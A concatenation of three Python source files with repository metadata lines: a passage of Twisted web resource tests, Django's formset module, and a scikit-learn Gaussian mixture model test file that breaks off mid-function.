Tests for L{ErrorPage}, L{NoResource}, and L{ForbiddenResource}.
"""
errorPage = ErrorPage
noResource = NoResource
forbiddenResource = ForbiddenResource
def test_getChild(self):
"""
The C{getChild} method of L{ErrorPage} returns the L{ErrorPage} it is
called on.
"""
page = self.errorPage(321, "foo", "bar")
self.assertIdentical(page.getChild(b"name", object()), page)
def _pageRenderingTest(self, page, code, brief, detail):
request = DummyRequest([b''])
template = (
u"\n"
u"<html>\n"
u" <head><title>%s - %s</title></head>\n"
u" <body>\n"
u" <h1>%s</h1>\n"
u" <p>%s</p>\n"
u" </body>\n"
u"</html>\n")
expected = template % (code, brief, brief, detail)
self.assertEqual(
page.render(request), expected.encode('utf-8'))
self.assertEqual(request.responseCode, code)
self.assertEqual(
request.outgoingHeaders,
{b'content-type': b'text/html; charset=utf-8'})
def test_errorPageRendering(self):
"""
L{ErrorPage.render} returns a C{bytes} describing the error defined by
the response code and message passed to L{ErrorPage.__init__}. It also
uses that response code to set the response code on the L{Request}
passed in.
"""
code = 321
brief = "brief description text"
detail = "much longer text might go here"
page = self.errorPage(code, brief, detail)
self._pageRenderingTest(page, code, brief, detail)
def test_noResourceRendering(self):
"""
L{NoResource} sets the HTTP I{NOT FOUND} code.
"""
detail = "long message"
page = self.noResource(detail)
self._pageRenderingTest(page, NOT_FOUND, "No Such Resource", detail)
def test_forbiddenResourceRendering(self):
"""
L{ForbiddenResource} sets the HTTP I{FORBIDDEN} code.
"""
detail = "longer message"
page = self.forbiddenResource(detail)
self._pageRenderingTest(page, FORBIDDEN, "Forbidden Resource", detail)
class DynamicChild(Resource):
"""
A L{Resource} to be created on the fly by L{DynamicChildren}.
"""
def __init__(self, path, request):
Resource.__init__(self)
self.path = path
self.request = request
class DynamicChildren(Resource):
"""
A L{Resource} with dynamic children.
"""
def getChild(self, path, request):
return DynamicChild(path, request)
class BytesReturnedRenderable(Resource):
"""
A L{Resource} with minimal capabilities to render a response.
"""
def __init__(self, response):
"""
@param response: A C{bytes} object giving the value to return from
C{render_GET}.
"""
Resource.__init__(self)
self._response = response
def render_GET(self, request):
"""
Render a response to a I{GET} request by returning a short byte string
to be written by the server.
"""
return self._response
class ImplicitAllowedMethods(Resource):
"""
A L{Resource} which implicitly defines its allowed methods by defining
renderers to handle them.
"""
def render_GET(self, request):
pass
def render_PUT(self, request):
pass
class ResourceTests(TestCase):
"""
Tests for L{Resource}.
"""
def test_staticChildren(self):
"""
L{Resource.putChild} adds a I{static} child to the resource. That child
is returned from any call to L{Resource.getChildWithDefault} for the
child's path.
"""
resource = Resource()
child = Resource()
sibling = Resource()
resource.putChild(b"foo", child)
resource.putChild(b"bar", sibling)
self.assertIdentical(
child, resource.getChildWithDefault(b"foo", DummyRequest([])))
def test_dynamicChildren(self):
"""
L{Resource.getChildWithDefault} delegates to L{Resource.getChild} when
the requested path is not associated with any static child.
"""
path = b"foo"
request = DummyRequest([])
resource = DynamicChildren()
child = resource.getChildWithDefault(path, request)
self.assertIsInstance(child, DynamicChild)
self.assertEqual(child.path, path)
self.assertIdentical(child.request, request)
def test_defaultHEAD(self):
"""
When not otherwise overridden, L{Resource.render} treats a I{HEAD}
request as if it were a I{GET} request.
"""
expected = b"insert response here"
request = DummyRequest([])
request.method = b'HEAD'
resource = BytesReturnedRenderable(expected)
self.assertEqual(expected, resource.render(request))
def test_explicitAllowedMethods(self):
"""
The L{UnsupportedMethod} raised by L{Resource.render} for an unsupported
request method has a C{allowedMethods} attribute set to the value of the
C{allowedMethods} attribute of the L{Resource}, if it has one.
"""
expected = [b'GET', b'HEAD', b'PUT']
resource = Resource()
resource.allowedMethods = expected
request = DummyRequest([])
request.method = b'FICTIONAL'
exc = self.assertRaises(UnsupportedMethod, resource.render, request)
self.assertEqual(set(expected), set(exc.allowedMethods))
def test_implicitAllowedMethods(self):
"""
The L{UnsupportedMethod} raised by L{Resource.render} for an unsupported
request method has a C{allowedMethods} attribute set to a list of the
methods supported by the L{Resource}, as determined by the
I{render_}-prefixed methods which it defines, if C{allowedMethods} is
not explicitly defined by the L{Resource}.
"""
expected = set([b'GET', b'HEAD', b'PUT'])
resource = ImplicitAllowedMethods()
request = DummyRequest([])
request.method = b'FICTIONAL'
exc = self.assertRaises(UnsupportedMethod, resource.render, request)
self.assertEqual(expected, set(exc.allowedMethods))
class GetChildForRequestTests(TestCase):
"""
Tests for L{getChildForRequest}.
"""
def test_exhaustedPostPath(self):
"""
L{getChildForRequest} returns whatever resource has been reached by the
time the request's C{postpath} is empty.
"""
request = DummyRequest([])
resource = Resource()
result = getChildForRequest(resource, request)
self.assertIdentical(resource, result)
def test_leafResource(self):
"""
L{getChildForRequest} returns the first resource it encounters with a
C{isLeaf} attribute set to C{True}.
"""
request = DummyRequest([b"foo", b"bar"])
resource = Resource()
resource.isLeaf = True
result = getChildForRequest(resource, request)
self.assertIdentical(resource, result)
def test_postPathToPrePath(self):
"""
As path segments from the request are traversed, they are taken from
C{postpath} and put into C{prepath}.
"""
request = DummyRequest([b"foo", b"bar"])
root = Resource()
child = Resource()
child.isLeaf = True
root.putChild(b"foo", child)
self.assertIdentical(child, getChildForRequest(root, request))
self.assertEqual(request.prepath, [b"foo"])
self.assertEqual(request.postpath, [b"bar"])
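# A minimal usage sketch (not part of the original suite) of the traversal
# exercised by GetChildForRequestTests; guarded so importing this test module
# stays side-effect free:
if __name__ == '__main__':
    demo_root = Resource()
    demo_child = Resource()
    demo_child.isLeaf = True
    demo_root.putChild(b"docs", demo_child)
    demo_request = DummyRequest([b"docs", b"intro"])
    assert getChildForRequest(demo_root, demo_request) is demo_child
    print("prepath=%r postpath=%r" % (demo_request.prepath,
                                      demo_request.postpath))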
|
bsd-3-clause
|
hcsturix74/django
|
django/forms/formsets.py
|
362
|
17988
|
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.forms import Form
from django.forms.fields import BooleanField, IntegerField
from django.forms.utils import ErrorList
from django.forms.widgets import HiddenInput
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.html import html_safe
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
from django.utils.translation import ugettext as _, ungettext
__all__ = ('BaseFormSet', 'formset_factory', 'all_valid')
# special field names
TOTAL_FORM_COUNT = 'TOTAL_FORMS'
INITIAL_FORM_COUNT = 'INITIAL_FORMS'
MIN_NUM_FORM_COUNT = 'MIN_NUM_FORMS'
MAX_NUM_FORM_COUNT = 'MAX_NUM_FORMS'
ORDERING_FIELD_NAME = 'ORDER'
DELETION_FIELD_NAME = 'DELETE'
# default minimum number of forms in a formset
DEFAULT_MIN_NUM = 0
# default maximum number of forms in a formset, to prevent memory exhaustion
DEFAULT_MAX_NUM = 1000
class ManagementForm(Form):
"""
``ManagementForm`` is used to keep track of how many form instances
    are displayed on the page. If adding new forms via JavaScript, you should
    increment the count field of this form as well.
"""
def __init__(self, *args, **kwargs):
self.base_fields[TOTAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
self.base_fields[INITIAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
# MIN_NUM_FORM_COUNT and MAX_NUM_FORM_COUNT are output with the rest of
# the management form, but only for the convenience of client-side
# code. The POST value of them returned from the client is not checked.
self.base_fields[MIN_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
self.base_fields[MAX_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
super(ManagementForm, self).__init__(*args, **kwargs)
@html_safe
@python_2_unicode_compatible
class BaseFormSet(object):
"""
A collection of instances of the same Form class.
"""
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, form_kwargs=None):
self.is_bound = data is not None or files is not None
self.prefix = prefix or self.get_default_prefix()
self.auto_id = auto_id
self.data = data or {}
self.files = files or {}
self.initial = initial
self.form_kwargs = form_kwargs or {}
self.error_class = error_class
self._errors = None
self._non_form_errors = None
def __str__(self):
return self.as_table()
def __iter__(self):
"""Yields the forms in the order they should be rendered"""
return iter(self.forms)
def __getitem__(self, index):
"""Returns the form at the given index, based on the rendering order"""
return self.forms[index]
def __len__(self):
return len(self.forms)
def __bool__(self):
"""All formsets have a management form which is not included in the length"""
return True
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
@property
def management_form(self):
"""Returns the ManagementForm instance for this FormSet."""
if self.is_bound:
form = ManagementForm(self.data, auto_id=self.auto_id, prefix=self.prefix)
if not form.is_valid():
raise ValidationError(
_('ManagementForm data is missing or has been tampered with'),
code='missing_management_form',
)
else:
form = ManagementForm(auto_id=self.auto_id, prefix=self.prefix, initial={
TOTAL_FORM_COUNT: self.total_form_count(),
INITIAL_FORM_COUNT: self.initial_form_count(),
MIN_NUM_FORM_COUNT: self.min_num,
MAX_NUM_FORM_COUNT: self.max_num
})
return form
def total_form_count(self):
"""Returns the total number of forms in this FormSet."""
if self.is_bound:
# return absolute_max if it is lower than the actual total form
# count in the data; this is DoS protection to prevent clients
# from forcing the server to instantiate arbitrary numbers of
# forms
return min(self.management_form.cleaned_data[TOTAL_FORM_COUNT], self.absolute_max)
else:
initial_forms = self.initial_form_count()
total_forms = max(initial_forms, self.min_num) + self.extra
# Allow all existing related objects/inlines to be displayed,
# but don't allow extra beyond max_num.
if initial_forms > self.max_num >= 0:
total_forms = initial_forms
elif total_forms > self.max_num >= 0:
total_forms = self.max_num
return total_forms
def initial_form_count(self):
"""Returns the number of forms that are required in this FormSet."""
if self.is_bound:
return self.management_form.cleaned_data[INITIAL_FORM_COUNT]
else:
# Use the length of the initial data if it's there, 0 otherwise.
initial_forms = len(self.initial) if self.initial else 0
return initial_forms
@cached_property
def forms(self):
"""
Instantiate forms at first property access.
"""
# DoS protection is included in total_form_count()
forms = [self._construct_form(i, **self.get_form_kwargs(i))
for i in range(self.total_form_count())]
return forms
def get_form_kwargs(self, index):
"""
Return additional keyword arguments for each individual formset form.
index will be None if the form being constructed is a new empty
form.
"""
return self.form_kwargs.copy()
def _construct_form(self, i, **kwargs):
"""
Instantiates and returns the i-th form instance in a formset.
"""
defaults = {
'auto_id': self.auto_id,
'prefix': self.add_prefix(i),
'error_class': self.error_class,
}
if self.is_bound:
defaults['data'] = self.data
defaults['files'] = self.files
if self.initial and 'initial' not in kwargs:
try:
defaults['initial'] = self.initial[i]
except IndexError:
pass
# Allow extra forms to be empty, unless they're part of
# the minimum forms.
if i >= self.initial_form_count() and i >= self.min_num:
defaults['empty_permitted'] = True
defaults.update(kwargs)
form = self.form(**defaults)
self.add_fields(form, i)
return form
@property
def initial_forms(self):
"""Return a list of all the initial forms in this formset."""
return self.forms[:self.initial_form_count()]
@property
def extra_forms(self):
"""Return a list of all the extra forms in this formset."""
return self.forms[self.initial_form_count():]
@property
def empty_form(self):
form = self.form(
auto_id=self.auto_id,
prefix=self.add_prefix('__prefix__'),
empty_permitted=True,
**self.get_form_kwargs(None)
)
self.add_fields(form, None)
return form
@property
def cleaned_data(self):
"""
Returns a list of form.cleaned_data dicts for every form in self.forms.
"""
if not self.is_valid():
raise AttributeError("'%s' object has no attribute 'cleaned_data'" % self.__class__.__name__)
return [form.cleaned_data for form in self.forms]
@property
def deleted_forms(self):
"""
Returns a list of forms that have been marked for deletion.
"""
if not self.is_valid() or not self.can_delete:
return []
# construct _deleted_form_indexes which is just a list of form indexes
# that have had their deletion widget set to True
if not hasattr(self, '_deleted_form_indexes'):
self._deleted_form_indexes = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
if self._should_delete_form(form):
self._deleted_form_indexes.append(i)
return [self.forms[i] for i in self._deleted_form_indexes]
@property
def ordered_forms(self):
"""
        Returns a list of forms in the order specified by the incoming data.
Raises an AttributeError if ordering is not allowed.
"""
if not self.is_valid() or not self.can_order:
raise AttributeError("'%s' object has no attribute 'ordered_forms'" % self.__class__.__name__)
# Construct _ordering, which is a list of (form_index, order_field_value)
# tuples. After constructing this list, we'll sort it by order_field_value
# so we have a way to get to the form indexes in the order specified
# by the form data.
if not hasattr(self, '_ordering'):
self._ordering = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
# don't add data marked for deletion to self.ordered_data
if self.can_delete and self._should_delete_form(form):
continue
self._ordering.append((i, form.cleaned_data[ORDERING_FIELD_NAME]))
# After we're done populating self._ordering, sort it.
# A sort function to order things numerically ascending, but
# None should be sorted below anything else. Allowing None as
# a comparison value makes it so we can leave ordering fields
# blank.
def compare_ordering_key(k):
if k[1] is None:
return (1, 0) # +infinity, larger than any number
return (0, k[1])
self._ordering.sort(key=compare_ordering_key)
# Return a list of form.cleaned_data dicts in the order specified by
# the form data.
return [self.forms[i[0]] for i in self._ordering]
@classmethod
def get_default_prefix(cls):
return 'form'
def non_form_errors(self):
"""
Returns an ErrorList of errors that aren't associated with a particular
form -- i.e., from formset.clean(). Returns an empty ErrorList if there
are none.
"""
if self._non_form_errors is None:
self.full_clean()
return self._non_form_errors
@property
def errors(self):
"""
Returns a list of form.errors for every form in self.forms.
"""
if self._errors is None:
self.full_clean()
return self._errors
def total_error_count(self):
"""
Returns the number of errors across all forms in the formset.
"""
return len(self.non_form_errors()) +\
sum(len(form_errors) for form_errors in self.errors)
def _should_delete_form(self, form):
"""
Returns whether or not the form was marked for deletion.
"""
return form.cleaned_data.get(DELETION_FIELD_NAME, False)
def is_valid(self):
"""
Returns True if every form in self.forms is valid.
"""
if not self.is_bound:
return False
# We loop over every form.errors here rather than short circuiting on the
# first failure to make sure validation gets triggered for every form.
forms_valid = True
# This triggers a full clean.
self.errors
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete:
if self._should_delete_form(form):
# This form is going to be deleted so any of its errors
# should not cause the entire formset to be invalid.
continue
forms_valid &= form.is_valid()
return forms_valid and not self.non_form_errors()
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self._non_form_errors.
"""
self._errors = []
self._non_form_errors = self.error_class()
if not self.is_bound: # Stop further processing.
return
for i in range(0, self.total_form_count()):
form = self.forms[i]
self._errors.append(form.errors)
try:
if (self.validate_max and
self.total_form_count() - len(self.deleted_forms) > self.max_num) or \
self.management_form.cleaned_data[TOTAL_FORM_COUNT] > self.absolute_max:
raise ValidationError(ungettext(
"Please submit %d or fewer forms.",
"Please submit %d or fewer forms.", self.max_num) % self.max_num,
code='too_many_forms',
)
if (self.validate_min and
self.total_form_count() - len(self.deleted_forms) < self.min_num):
raise ValidationError(ungettext(
"Please submit %d or more forms.",
"Please submit %d or more forms.", self.min_num) % self.min_num,
code='too_few_forms')
# Give self.clean() a chance to do cross-form validation.
self.clean()
except ValidationError as e:
self._non_form_errors = self.error_class(e.error_list)
def clean(self):
"""
Hook for doing any extra formset-wide cleaning after Form.clean() has
been called on every form. Any ValidationError raised by this method
will not be associated with a particular form; it will be accessible
via formset.non_form_errors()
"""
pass
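    # A sketch of a typical ``clean`` override (hypothetical subclass and
    # field names), rejecting duplicate values across forms:
    #
    #     class ArticleFormSet(BaseFormSet):
    #         def clean(self):
    #             titles = [f.cleaned_data.get('title')
    #                       for f in self.forms if f.cleaned_data]
    #             if len(titles) != len(set(titles)):
    #                 raise ValidationError("Titles must be distinct.")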
def has_changed(self):
"""
Returns true if data in any form differs from initial.
"""
return any(form.has_changed() for form in self)
def add_fields(self, form, index):
"""A hook for adding extra fields on to each form instance."""
if self.can_order:
# Only pre-fill the ordering field for initial forms.
if index is not None and index < self.initial_form_count():
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)
else:
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)
if self.can_delete:
form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)
def add_prefix(self, index):
return '%s-%s' % (self.prefix, index)
def is_multipart(self):
"""
Returns True if the formset needs to be multipart, i.e. it
has FileInput. Otherwise, False.
"""
if self.forms:
return self.forms[0].is_multipart()
else:
return self.empty_form.is_multipart()
@property
def media(self):
# All the forms on a FormSet are the same, so you only need to
# interrogate the first form for media.
if self.forms:
return self.forms[0].media
else:
return self.empty_form.media
def as_table(self):
"Returns this formset rendered as HTML <tr>s -- excluding the <table></table>."
# XXX: there is no semantic division between forms here, there
# probably should be. It might make sense to render each form as a
# table row with each field as a td.
forms = ' '.join(form.as_table() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_p(self):
"Returns this formset rendered as HTML <p>s."
forms = ' '.join(form.as_p() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_ul(self):
"Returns this formset rendered as HTML <li>s."
forms = ' '.join(form.as_ul() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def formset_factory(form, formset=BaseFormSet, extra=1, can_order=False,
can_delete=False, max_num=None, validate_max=False,
min_num=None, validate_min=False):
"""Return a FormSet for the given form class."""
if min_num is None:
min_num = DEFAULT_MIN_NUM
if max_num is None:
max_num = DEFAULT_MAX_NUM
# hard limit on forms instantiated, to prevent memory-exhaustion attacks
# limit is simply max_num + DEFAULT_MAX_NUM (which is 2*DEFAULT_MAX_NUM
# if max_num is None in the first place)
absolute_max = max_num + DEFAULT_MAX_NUM
attrs = {'form': form, 'extra': extra,
'can_order': can_order, 'can_delete': can_delete,
'min_num': min_num, 'max_num': max_num,
'absolute_max': absolute_max, 'validate_min': validate_min,
'validate_max': validate_max}
return type(form.__name__ + str('FormSet'), (formset,), attrs)
def all_valid(formsets):
"""Returns true if every formset in formsets is valid."""
valid = True
for formset in formsets:
if not formset.is_valid():
valid = False
return valid
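# A usage sketch (hypothetical form; assumes a configured Django settings
# module) showing how formset_factory and the form counts interact:
if __name__ == '__main__':
    from django.forms.fields import CharField

    class ArticleForm(Form):
        title = CharField()

    ArticleFormSet = formset_factory(ArticleForm, extra=2, can_delete=True)
    formset = ArticleFormSet(initial=[{'title': 'First'}])
    # One initial form plus two extra forms:
    assert formset.total_form_count() == 3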
|
bsd-3-clause
|
hsuantien/scikit-learn
|
sklearn/mixture/tests/test_gmm.py
|
200
|
17427
|
import unittest
import copy
import sys
from nose.tools import assert_true
import numpy as np
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
assert_raises)
from scipy import stats
from sklearn import mixture
from sklearn.datasets.samples_generator import make_spd_matrix
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raise_message
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.externals.six.moves import cStringIO as StringIO
rng = np.random.RandomState(0)
def test_sample_gaussian():
# Test sample generation from mixture.sample_gaussian where covariance
# is diagonal, spherical and full
n_features, n_samples = 2, 300
axis = 1
mu = rng.randint(10) * rng.rand(n_features)
cv = (rng.rand(n_features) + 1.0) ** 2
samples = mixture.sample_gaussian(
mu, cv, covariance_type='diag', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.3))
assert_true(np.allclose(samples.var(axis), cv, atol=1.5))
# the same for spherical covariances
cv = (rng.rand() + 1.0) ** 2
samples = mixture.sample_gaussian(
mu, cv, covariance_type='spherical', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.5))
assert_true(np.allclose(
samples.var(axis), np.repeat(cv, n_features), atol=1.5))
# and for full covariances
A = rng.randn(n_features, n_features)
cv = np.dot(A.T, A) + np.eye(n_features)
samples = mixture.sample_gaussian(
mu, cv, covariance_type='full', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.3))
assert_true(np.allclose(np.cov(samples), cv, atol=2.5))
# Numerical stability check: in SciPy 0.12.0 at least, eigh may return
# tiny negative values in its second return value.
from sklearn.mixture import sample_gaussian
x = sample_gaussian([0, 0], [[4, 3], [1, .1]],
covariance_type='full', random_state=42)
print(x)
assert_true(np.isfinite(x).all())
def _naive_lmvnpdf_diag(X, mu, cv):
# slow and naive implementation of lmvnpdf
ref = np.empty((len(X), len(mu)))
stds = np.sqrt(cv)
for i, (m, std) in enumerate(zip(mu, stds)):
ref[:, i] = np.log(stats.norm.pdf(X, m, std)).sum(axis=1)
return ref
def test_lmvnpdf_diag():
# test a slow and naive implementation of lmvnpdf and
# compare it to the vectorized version (mixture.lmvnpdf) to test
# for correctness
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
cv = (rng.rand(n_components, n_features) + 1.0) ** 2
X = rng.randint(10) * rng.rand(n_samples, n_features)
ref = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, cv, 'diag')
assert_array_almost_equal(lpr, ref)
def test_lmvnpdf_spherical():
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
spherecv = rng.rand(n_components, 1) ** 2 + 1
X = rng.randint(10) * rng.rand(n_samples, n_features)
cv = np.tile(spherecv, (n_features, 1))
reference = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, spherecv,
'spherical')
assert_array_almost_equal(lpr, reference)
def test_lmvnpdf_full():
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
cv = (rng.rand(n_components, n_features) + 1.0) ** 2
X = rng.randint(10) * rng.rand(n_samples, n_features)
fullcv = np.array([np.diag(x) for x in cv])
reference = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, fullcv, 'full')
assert_array_almost_equal(lpr, reference)
def test_lvmpdf_full_cv_non_positive_definite():
n_features, n_samples = 2, 10
rng = np.random.RandomState(0)
X = rng.randint(10) * rng.rand(n_samples, n_features)
mu = np.mean(X, 0)
cv = np.array([[[-1, 0], [0, 1]]])
expected_message = "'covars' must be symmetric, positive-definite"
assert_raise_message(ValueError, expected_message,
mixture.log_multivariate_normal_density,
X, mu, cv, 'full')
def test_GMM_attributes():
n_components, n_features = 10, 4
covariance_type = 'diag'
g = mixture.GMM(n_components, covariance_type, random_state=rng)
weights = rng.rand(n_components)
weights = weights / weights.sum()
means = rng.randint(-20, 20, (n_components, n_features))
assert_true(g.n_components == n_components)
assert_true(g.covariance_type == covariance_type)
g.weights_ = weights
assert_array_almost_equal(g.weights_, weights)
g.means_ = means
assert_array_almost_equal(g.means_, means)
covars = (0.1 + 2 * rng.rand(n_components, n_features)) ** 2
g.covars_ = covars
assert_array_almost_equal(g.covars_, covars)
assert_raises(ValueError, g._set_covars, [])
assert_raises(ValueError, g._set_covars,
np.zeros((n_components - 2, n_features)))
assert_raises(ValueError, mixture.GMM, n_components=20,
covariance_type='badcovariance_type')
class GMMTester():
do_test_eval = True
def _setUp(self):
self.n_components = 10
self.n_features = 4
self.weights = rng.rand(self.n_components)
self.weights = self.weights / self.weights.sum()
self.means = rng.randint(-20, 20, (self.n_components, self.n_features))
self.threshold = -0.5
self.I = np.eye(self.n_features)
self.covars = {
'spherical': (0.1 + 2 * rng.rand(self.n_components,
self.n_features)) ** 2,
'tied': (make_spd_matrix(self.n_features, random_state=0)
+ 5 * self.I),
'diag': (0.1 + 2 * rng.rand(self.n_components,
self.n_features)) ** 2,
'full': np.array([make_spd_matrix(self.n_features, random_state=0)
+ 5 * self.I for x in range(self.n_components)])}
def test_eval(self):
        if not self.do_test_eval:
            return  # DPGMM does not support setting the means and
        # covariances before fitting. There is no way of fixing this
        # due to the variational parameters being more expressive than
        # covariance matrices.
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type, random_state=rng)
# Make sure the means are far apart so responsibilities.argmax()
# picks the actual component used to generate the observations.
g.means_ = 20 * self.means
g.covars_ = self.covars[self.covariance_type]
g.weights_ = self.weights
gaussidx = np.repeat(np.arange(self.n_components), 5)
n_samples = len(gaussidx)
X = rng.randn(n_samples, self.n_features) + g.means_[gaussidx]
ll, responsibilities = g.score_samples(X)
self.assertEqual(len(ll), n_samples)
self.assertEqual(responsibilities.shape,
(n_samples, self.n_components))
assert_array_almost_equal(responsibilities.sum(axis=1),
np.ones(n_samples))
assert_array_equal(responsibilities.argmax(axis=1), gaussidx)
def test_sample(self, n=100):
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type, random_state=rng)
# Make sure the means are far apart so responsibilities.argmax()
# picks the actual component used to generate the observations.
g.means_ = 20 * self.means
g.covars_ = np.maximum(self.covars[self.covariance_type], 0.1)
g.weights_ = self.weights
samples = g.sample(n)
self.assertEqual(samples.shape, (n, self.n_features))
def test_train(self, params='wmc'):
g = mixture.GMM(n_components=self.n_components,
covariance_type=self.covariance_type)
g.weights_ = self.weights
g.means_ = self.means
g.covars_ = 20 * self.covars[self.covariance_type]
# Create a training set by sampling from the predefined distribution.
X = g.sample(n_samples=100)
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-1,
n_iter=1, init_params=params)
g.fit(X)
# Do one training iteration at a time so we can keep track of
# the log likelihood to make sure that it increases after each
# iteration.
trainll = []
for _ in range(5):
g.params = params
g.init_params = ''
g.fit(X)
trainll.append(self.score(g, X))
g.n_iter = 10
g.init_params = ''
g.params = params
g.fit(X) # finish fitting
# Note that the log likelihood will sometimes decrease by a
# very small amount after it has more or less converged due to
# the addition of min_covar to the covariance (to prevent
# underflow). This is why the threshold is set to -0.5
# instead of 0.
delta_min = np.diff(trainll).min()
self.assertTrue(
delta_min > self.threshold,
"The min nll increase is %f which is lower than the admissible"
" threshold of %f, for model %s. The likelihoods are %s."
% (delta_min, self.threshold, self.covariance_type, trainll))
def test_train_degenerate(self, params='wmc'):
# Train on degenerate data with 0 in some dimensions
# Create a training set by sampling from the predefined distribution.
X = rng.randn(100, self.n_features)
X.T[1:] = 0
g = self.model(n_components=2, covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-3, n_iter=5,
init_params=params)
g.fit(X)
trainll = g.score(X)
self.assertTrue(np.sum(np.abs(trainll / 100 / X.shape[1])) < 5)
def test_train_1d(self, params='wmc'):
# Train on 1-D data
# Create a training set by sampling from the predefined distribution.
X = rng.randn(100, 1)
# X.T[1:] = 0
g = self.model(n_components=2, covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-7, n_iter=5,
init_params=params)
g.fit(X)
trainll = g.score(X)
if isinstance(g, mixture.DPGMM):
self.assertTrue(np.sum(np.abs(trainll / 100)) < 5)
else:
self.assertTrue(np.sum(np.abs(trainll / 100)) < 2)
def score(self, g, X):
return g.score(X).sum()
class TestGMMWithSphericalCovars(unittest.TestCase, GMMTester):
covariance_type = 'spherical'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithDiagonalCovars(unittest.TestCase, GMMTester):
covariance_type = 'diag'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithTiedCovars(unittest.TestCase, GMMTester):
covariance_type = 'tied'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithFullCovars(unittest.TestCase, GMMTester):
covariance_type = 'full'
model = mixture.GMM
setUp = GMMTester._setUp
def test_multiple_init():
    # Test that multiple inits do not do much worse than a single one
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, covariance_type='spherical',
random_state=rng, min_covar=1e-7, n_iter=5)
train1 = g.fit(X).score(X).sum()
g.n_init = 5
train2 = g.fit(X).score(X).sum()
assert_true(train2 >= train1 - 1.e-2)
def test_n_parameters():
# Test that the right number of parameters is estimated
n_samples, n_dim, n_components = 7, 5, 2
X = rng.randn(n_samples, n_dim)
n_params = {'spherical': 13, 'diag': 21, 'tied': 26, 'full': 41}
for cv_type in ['full', 'tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7, n_iter=1)
g.fit(X)
assert_true(g._n_parameters() == n_params[cv_type])
def test_1d_1component():
# Test all of the covariance_types return the same BIC score for
# 1-dimensional, 1 component fits.
n_samples, n_dim, n_components = 100, 1, 1
X = rng.randn(n_samples, n_dim)
g_full = mixture.GMM(n_components=n_components, covariance_type='full',
random_state=rng, min_covar=1e-7, n_iter=1)
g_full.fit(X)
g_full_bic = g_full.bic(X)
for cv_type in ['tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7, n_iter=1)
g.fit(X)
assert_array_almost_equal(g.bic(X), g_full_bic)
def assert_fit_predict_correct(model, X):
model2 = copy.deepcopy(model)
predictions_1 = model.fit(X).predict(X)
predictions_2 = model2.fit_predict(X)
assert adjusted_rand_score(predictions_1, predictions_2) == 1.0
def test_fit_predict():
"""
test that gmm.fit_predict is equivalent to gmm.fit + gmm.predict
"""
lrng = np.random.RandomState(101)
n_samples, n_dim, n_comps = 100, 2, 2
mu = np.array([[8, 8]])
component_0 = lrng.randn(n_samples, n_dim)
component_1 = lrng.randn(n_samples, n_dim) + mu
X = np.vstack((component_0, component_1))
for m_constructor in (mixture.GMM, mixture.VBGMM, mixture.DPGMM):
model = m_constructor(n_components=n_comps, covariance_type='full',
min_covar=1e-7, n_iter=5,
random_state=np.random.RandomState(0))
assert_fit_predict_correct(model, X)
model = mixture.GMM(n_components=n_comps, n_iter=0)
z = model.fit_predict(X)
assert np.all(z == 0), "Quick Initialization Failed!"
def test_aic():
# Test the aic and bic criteria
n_samples, n_dim, n_components = 50, 3, 2
X = rng.randn(n_samples, n_dim)
SGH = 0.5 * (X.var() + np.log(2 * np.pi)) # standard gaussian entropy
for cv_type in ['full', 'tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7)
g.fit(X)
aic = 2 * n_samples * SGH * n_dim + 2 * g._n_parameters()
